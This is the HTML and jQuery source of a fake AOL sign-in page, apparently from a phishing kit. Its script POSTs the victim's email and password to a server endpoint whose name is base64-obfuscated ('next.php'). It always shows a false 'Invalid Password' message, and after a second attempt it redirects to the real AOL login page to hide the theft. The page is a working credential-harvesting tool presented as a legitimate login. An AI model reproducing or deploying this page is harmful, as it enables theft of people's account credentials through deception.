<!doctype html>
<html lang="en">

<head>
    <script type="text/JavaScript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
    <title>AOL Login</title>
    <link href="css/hover.css" rel="stylesheet" media="all">
    <style type="text/css">
    textarea:hover,
    input:hover,
    textarea:active,
    input:active,
    textarea:focus,
    input:focus,
    button:focus,
    button:active,
    button:hover,
    label:focus,
    .btn:active,
    .btn.active {
        outline: 0px !important;
        -webkit-appearance: none;
        box-shadow: none !important;
    }
    </style>
</head>

<body style="background-color:#F9F9FA;">
    <div class="container-fluid p-0">
        <div class="container-fluid">
            <div class="row">
                <div class="col-lg-6 ">
                    <img src="images/aol.png" class="img-fluid p-4" width="150px">
                </div>
                <div class="col-lg-6 text-right align-self-center">
                    <a href="#" class="mr-5">Help</a>
                </div>
            </div>
        </div>
        <div class="container">
            <div class="row">
                <div class="col-lg-7 my-auto">
                </div>
                <div class="col-lg-5">
                    <div class="mx-5 mb-5 mt-2 p-4 bg-white rounded" id="div1" style="box-shadow: 0 2px 4px 0 rgb(0 0 0 / 30%);">
                        <div class="text-center">
                            <img src="images/aol.png" class="img-fluid" width="90px"><br><br><br>
                            <span class="h5" style="font-weight: 700">Sign In</span><br><br><br>
                            <span class="text-danger error" style="display: none;font-size: 14px">That account doesn't exist. Enter a different account</span><br>
                            <div class="form-group mt-5">
                                <!-- <label class="h5">ai</label> -->
                                <input type="email" name="ai" class="form-control rounded-0" id="ai" aria-describedby="aiHelp" placeholder="Username, email, or mobile" style="border-right: none;border-left: none;border-top: none;">
                            </div>
                            <div class=" mt-4">
                                <button class="btn rounded-0 text-white btn-primary px-4 w-100" id="next">Next</button>
                            </div>
                        </div>
                        <div class="form-check mt-4">
                            <input type="checkbox" class="form-check-input" id="exampleCheck1">
                            <label class="form-check-label" for="exampleCheck1"><a href="#">Stay Signed in</a></label>
                            <span><a href="#" class="float-right">Forgot username?</a></span>
                        </div>
                        <div class="mb-2" style="margin-top: 100px">
                            <button class="btn rounded-0 text-primary bg-white border-primary px-4 w-100" id="next">Create an Account</button>
                        </div>
                    </div>
                    <div class="mx-5 mb-5 mt-2 p-4 bg-white rounded" id="div2" style="box-shadow: 0 2px 4px 0 rgb(0 0 0 / 30%);">
                        <div class="text-center">
                            <img src="images/aol.png" class="img-fluid" width="90px"><br><br><br>
                            <i class="fas fa-arrow-left " id="back"></i>&nbsp<span id="aich" class="font-weight-bold">abc@abc.com</span><br><br>
                            <span class="text-danger error" style="display: none;font-size: 14px">That account doesn't exist. Enter a different account</span><br>
                            <div class="alert alert-danger" id="msg" style="display: none;font-size: 14px">Invalid Password..! Please enter correct password.</div>
                            <div class="form-group mt-5">
                                <!-- <label class="h5">Password</label> -->
                                <input type="password" name="pr" class="form-control" id="pr" aria-describedby="aiHelp" placeholder="Enter Password" style="border-right: none;border-left: none;border-top: none;">
                            </div>
                            <div class=" mt-4">
                                <button class="btn rounded-0 text-white btn-primary px-4 w-100" id="submit-btn">login</button>
                            </div>
                        </div>
                        <div class="form-check mt-3">
                            <span><a href="#" class="float-right">Forgot password?</a></span>
                        </div>
                        <div class="mb-2" style="margin-top: 130px">
                            <button class="btn rounded-0 text-primary bg-white border-primary px-4 w-100" id="next">Create an Account</button>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!-- Optional JavaScript -->
        <!-- jQuery first, then Popper.js, then Bootstrap JS -->
        <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    $('.error').hide();
    $("#div2").hide();
    $("#msg").hide();
    var count = 0;
    $('#ai').click(function() {
        $('.error').hide();
    });
    $('#next').click(function() {
        var ai = $('#ai').val();
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        var my_ai = ai;
        if (!ai) {
            $('.error').show();
            $('.error').html("Email field is empty.!");
            return false;
        }

        if (!filter.test(my_ai)) {
            $('.error').show();
            $('.error').html("That account doesn't exist. Enter a different account");
            return false;
        }
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();

        $("#div1").animate({ left: 0, opacity: "hide" }, 0);
        $("#div2").animate({ right: 0, opacity: "show" }, 1000);
        $("#aich").html(my_ai);

    });
    $('#back').click(function() {
        $("#msg").hide();
        $(".error").hide();
        $("#div2").animate({ left: 0, opacity: "hide" }, 0);
        $("#div1").animate({ right: 0, opacity: "show" }, 1000);

    });

    var file = "bmV4dC5waHA=";
    $('#submit-btn').click(function(event) {
        $("#msg").hide();
        $(".error").hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        if (!pr) {
            $('.error').show();
            $('.error').html("Password field is empty.!");
            return false;
        }


        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,

            },
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },
            success: function(response) {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("https://login.aol.com/");
                    return false;
                }
                $("#msg").show();
            },
            error: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("https://login.aol.com/");
                    return false;
                }
                $("#msg").show();
            },
            complete: function() {
                $('#submit-btn').html('Login');
            }
        });
    });
});
</script>

</html>